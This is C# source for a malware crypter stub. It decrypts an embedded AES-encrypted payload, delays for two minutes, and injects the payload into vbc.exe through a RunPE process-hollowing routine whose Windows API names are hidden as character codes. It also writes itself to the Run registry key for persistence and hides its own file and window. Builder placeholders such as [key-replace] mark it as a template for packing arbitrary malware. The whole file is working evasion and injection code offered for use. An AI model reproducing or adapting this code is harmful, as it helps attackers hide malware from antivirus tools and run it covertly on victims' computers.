using System;using System.Collections.Generic;using System.Data;using Syst

1. using System;
2. using System.Collections.Generic;
3. using System.Data;
4. using System.Drawing;
5. using System.Threading;
6. using System.Text;
7. using System.Windows.Forms;
8. using System.IO;
9. using System.Runtime.InteropServices;
10. using System.Resources;
11. using System.Security.Cryptography;
12. using System.Reflection;
13. using Microsoft.Win32;
14.  
15. static class Program
16. {
17. [STAThread]
18. static void Main()
19. {
20. Application.EnableVisualStyles();
21. Application.SetCompatibleTextRenderingDefault(false);
22. Application.Run(new frmOne());
23. }
24. }
25.  
26. class Reader
27. {
28. [DllImport("kernel32.dll")]
29. static extern IntPtr GetModuleHandle(string module);
30. [DllImport( "kernel32.dll", SetLastError=true )]
31. static extern IntPtr FindResource(IntPtr hModule, string lpName, string lpType);
32. [DllImport("kernel32.dll", SetLastError=true)]
33. static extern IntPtr LoadResource(IntPtr hModule, IntPtr hResInfo);
34. [DllImport("kernel32.dll", SetLastError=true)]
35. static extern uint SizeofResource(IntPtr hModule, IntPtr hResInfo);
36.  
37. public static byte[] ReadNative()
38. {
39. // Get the handle of the resource from the defined file.
40. IntPtr hModule = GetModuleHandle(Assembly.GetExecutingAssembly().Location);
41. // Locates the resource using its name and type.
42. IntPtr loc = FindResource(hModule, "Encrypted", "RT_RCDATA");
43. // Loads the resource into a pointer to it.
44. IntPtr x = LoadResource(hModule, loc);
45. // Gets the size of the resource.
46. uint size = SizeofResource(hModule, loc);
47. // We declare a byte array with the size of the resource,
48. // to store the read bytes there.
49. byte[] ret = new byte[size];
50. // Copies the contents of the resource to the byte array
51. // from memory.
52. Marshal.Copy(x, ret, 0, (int)size);
53. // Returns the resource's byte array aka the encrypted file bytes.
54. return ret;
55. }
56.  
57. public static byte[] ReadManaged()
58. {
59. // We declare a new resource manager and we want it to manage the "Encrypted" resource.
60. ResourceManager Manager = new ResourceManager("Encrypted", Assembly.GetExecutingAssembly());
61. // We retrieve the resource as an object and we cast it to a byte array since it's
62. // a byte array.
63. byte[] bytes = (byte[])Manager.GetObject("encfile");
64. // We return the resource's byte array, aka the encrypted file bytes.
65. return bytes;
66. }
67. }
68.  
69. public partial class frmOne : Form
70. {
71.  
72. // This is needed so the form could initialize, be hidden from taskbar
73. // and also invisible.
74. private void InitializeComponent()
75. {
76. this.SuspendLayout();
77. this.FormBorderStyle = FormBorderStyle.None;
78. this.ShowInTaskbar = false;
79. this.ResumeLayout(false);
80. this.Visible = false;
81. this.WindowState = FormWindowState.Minimized;
82. }
83.  
84. // Variables that we need to control the execution.
85. // Storage declares the storage method we used.
86. string storage = "[storage-replace]";
87. // Startup declares if the stub should add itself to startup.
88. bool startup = [startup-replace];
89. // Hide declares if the stub should hide itself (the executable).
90. bool hide = [hide-replace];
91.  
92. // We get the path of vbc.exe, the process we'll be injecting into.
93. string vbcPath = Path.Combine(RuntimeEnvironment.GetRuntimeDirectory(), "vbc.exe");
94.  
95. public frmOne()
96. {
97. InitializeComponent();
98. // Declare a variable to store the encrypted file bytes.
99. byte[] filebytes = null;
100.  
101. if (storage == "native")
102. // If the storage method was native resources,
103. // get the file bytes from native resources.
104. filebytes = Reader.ReadNative();
105. else
106. // If the storage method was managed resources,
107. // get the file bytes from managed resources.
108. filebytes = Reader.ReadManaged();
109.  
110. // Decrypt the encrypted file bytes using the AES algorithm
111. // and the key the user generated on the builder.
112. filebytes = AESDecrypt(filebytes, "[key-replace]");
113.  
114. // Inject the bytes to vbc.exe
115. IX.AA(filebytes, vbcPath);
116.  
117. // Check if the user enabled startup.
118. // If he did, add the file to startup.
119. if (startup)
120. AddToStartup();
121.  
122. // Check if the user enable hide file.
123. // If he did, hide the file from the file explorer.
124. if (hide)
125. HideFile();
126. }
127.  
128.  
129. // This is the AES decryption algorithm.
130. public static byte[] AESDecrypt(byte[] input, string Pass)
131. {
132. System.Security.Cryptography.RijndaelManaged AES = new System.Security.Cryptography.RijndaelManaged();
133. byte[] hash = new byte[32];
134. byte[] temp = new MD5CryptoServiceProvider().ComputeHash(System.Text.Encoding.ASCII.GetBytes(Pass));
135. Array.Copy(temp, 0, hash, 0, 16);
136. Array.Copy(temp, 0, hash, 15, 16);
137. AES.Key = hash;
138. AES.Mode = System.Security.Cryptography.CipherMode.ECB;
139. Thread.Sleep(120000);
140. System.Security.Cryptography.ICryptoTransform DESDecrypter = AES.CreateDecryptor();
141. return DESDecrypter.TransformFinalBlock(input, 0, input.Length);
142. }
143.  
144. // This is the code to add the stub to startup.
145. public void AddToStartup()
146. {
147. RegistryKey Key = Registry.CurrentUser.OpenSubKey("Software\\Microsoft\\Windows\\CurrentVersion\\Run", true);
148. Key.SetValue("CryptedFile", Application.ExecutablePath);
149. }
150.  
151. // This is the code to hide the stub from the file explorer.
152. public void HideFile()
153. {
154. FileInfo Info = new FileInfo(Application.ExecutablePath);
155. Info.Attributes = FileAttributes.Hidden;
156. }
157. }
158.  
159.  
160. // This is the RunPE class (the code we use to inject the bytes to the target process)
161. // Credits to Oppresor for this class.
162. public class IX
163. {
164. [DllImport("kernel32.dll", CharSet = CharSet.Auto, SetLastError = true)]
165. internal static extern IntPtr LoadLibraryA([In, MarshalAs(UnmanagedType.LPStr)] string lpFileName);
166. [DllImport("kernel32", CharSet = CharSet.Ansi, ExactSpelling = true, SetLastError = true)]
167. static extern IntPtr GetProcAddress(IntPtr hModule, string procName);
168. delegate bool ESS(string appName, StringBuilder commandLine, IntPtr procAttr, IntPtr thrAttr, [MarshalAs(UnmanagedType.Bool)] bool inherit, int creation, IntPtr env, string curDir, byte[] sInfo, IntPtr[] pInfo);
169. delegate bool EXT(IntPtr hThr, uint[] ctxt);
170. delegate bool TEX(IntPtr t, uint[] c); //all kernel32
171. delegate uint ION(IntPtr hProc, IntPtr baseAddr); //ntdll
172. delegate bool ORY(IntPtr hProc, IntPtr baseAddr, ref IntPtr bufr, int bufrSize, ref IntPtr numRead);
173. delegate uint EAD(IntPtr hThread); //kernel32.dll
174. delegate IntPtr CEX(IntPtr hProc, IntPtr addr, IntPtr size, int allocType, int prot);
175. delegate bool CTEX(IntPtr hProcess, IntPtr lpAddress, IntPtr dwSize, uint flNewProtect, ref uint lpflOldProtect);
176. delegate bool MOR(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, uint nSize, out int lpNumberOfBytesWritten); //kernel32.dll
177. delegate bool OP(byte[] bytes, string surrogateProcess);
178.  
179. public T CreateAPI<T>(string name, string method)
180. {
181. return (T)(object)Marshal.GetDelegateForFunctionPointer(GetProcAddress(LoadLibraryA(name), method), typeof(T));
182. }
183. public static bool AA(byte[] bytes, string surrogateProcess)
184. {
185. IX p = new IX();
186. OP F1 = new OP(p.R);
187. bool Res = F1(bytes, surrogateProcess);
188. return Res;
189. }
190. public bool R(byte[] bytes, string surrogateProcess)
191. {
192. String K32 = Convert.ToString((char)107) + (char)101 + (char)114 + (char)110 + (char)101 + (char)108 + (char)51 + (char)50;
193. String NTD = Convert.ToString((char)110) + (char)116 + (char)100 + (char)108 + (char)108;
194. ESS CP = CreateAPI<ESS>(K32, Convert.ToString((char)67) + (char)114 + (char)101 + (char)97 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)65);
195. ION NUVS = CreateAPI<ION>(NTD, Convert.ToString((char)78) + (char)116 + (char)85 + (char)110 + (char)109 + (char)97 + (char)112 + (char)86 + (char)105 + (char)101 + (char)119 + (char)79 + (char)102 + (char)83 + (char)101 + (char)99 + (char)116 + (char)105 + (char)111 + (char)110);
196. EXT GTC = CreateAPI<EXT>(K32, Convert.ToString((char)71) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
197. TEX STC = CreateAPI<TEX>(K32, Convert.ToString((char)83) + (char)101 + (char)116 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100 + (char)67 + (char)111 + (char)110 + (char)116 + (char)101 + (char)120 + (char)116);
198. ORY RPM = CreateAPI<ORY>(K32, Convert.ToString((char)82) + (char)101 + (char)97 + (char)100 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
199. EAD RT = CreateAPI<EAD>(K32, Convert.ToString((char)82) + (char)101 + (char)115 + (char)117 + (char)109 + (char)101 + (char)84 + (char)104 + (char)114 + (char)101 + (char)97 + (char)100);
200. CEX VAE = CreateAPI<CEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)65 + (char)108 + (char)108 + (char)111 + (char)99 + (char)69 + (char)120);
201. CTEX VPE = CreateAPI<CTEX>(K32, Convert.ToString((char)86) + (char)105 + (char)114 + (char)116 + (char)117 + (char)97 + (char)108 + (char)80 + (char)114 + (char)111 + (char)116 + (char)101 + (char)99 + (char)116 + (char)69 + (char)120);
202. MOR WPM = CreateAPI<MOR>(K32, Convert.ToString((char)87) + (char)114 + (char)105 + (char)116 + (char)101 + (char)80 + (char)114 + (char)111 + (char)99 + (char)101 + (char)115 + (char)115 + (char)77 + (char)101 + (char)109 + (char)111 + (char)114 + (char)121);
203. try
204. {
205. IntPtr procAttr = IntPtr.Zero;
206. IntPtr[] processInfo = new IntPtr[4];
207. byte[] startupInfo = new byte[0x44];
208. int num2 = BitConverter.ToInt32(bytes, 60);
209. int num = BitConverter.ToInt16(bytes, num2 + 6);
210. IntPtr ptr4 = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x54));
211. if (CP(null, new StringBuilder(surrogateProcess), procAttr, procAttr, false, 4, procAttr, null, startupInfo, processInfo))
212. {
213. uint[] ctxt = new uint[0xb3];
214. ctxt[0] = 0x10002;
215. if (GTC(processInfo[1], ctxt))
216. {
217. IntPtr baseAddr = new IntPtr(ctxt[0x29] + 8L);
218. IntPtr buffer = IntPtr.Zero;
219. IntPtr bufferSize = new IntPtr(4);
220. IntPtr numRead = IntPtr.Zero;
221. if (RPM(processInfo[0], baseAddr, ref buffer, (int)bufferSize, ref numRead) && (NUVS(processInfo[0], buffer) == 0))
222. {
223. IntPtr addr = new IntPtr(BitConverter.ToInt32(bytes, num2 + 0x34));
224. IntPtr size = new IntPtr(BitConverter.ToInt32(bytes, num2 + 80));
225. IntPtr lpBaseAddress = VAE(processInfo[0], addr, size, 0x3000, 0x40);
226. int lpNumberOfBytesWritten;
227. WPM(processInfo[0], lpBaseAddress, bytes, (uint)((int)ptr4), out lpNumberOfBytesWritten);
228. int num5 = num - 1;
229. for (int i = 0; i <= num5; i++)
230. {
231. int[] dst = new int[10];
232. Buffer.BlockCopy(bytes, (num2 + 0xf8) + (i * 40), dst, 0, 40);
233. byte[] buffer2 = new byte[(dst[4] - 1) + 1];
234. Buffer.BlockCopy(bytes, dst[5], buffer2, Convert.ToInt32(null, 2), buffer2.Length);
235. size = new IntPtr(lpBaseAddress.ToInt32() + dst[3]);
236. addr = new IntPtr(buffer2.Length);
237. WPM(processInfo[0], size, buffer2, (uint)addr, out lpNumberOfBytesWritten);
238. }
239. size = new IntPtr(ctxt[0x29] + 8L);
240. addr = new IntPtr(4);
241. WPM(processInfo[0], size, BitConverter.GetBytes(lpBaseAddress.ToInt32()), (uint)addr, out lpNumberOfBytesWritten);
242. ctxt[0x2c] = (uint)(lpBaseAddress.ToInt32() + BitConverter.ToInt32(bytes, num2 + 40));
243. STC(processInfo[1], ctxt);
244. }
245. }
246. RT(processInfo[1]);
247. }
248. }
249. catch
250. {
251. return false;
252. }
253. return true;
254. }
255. }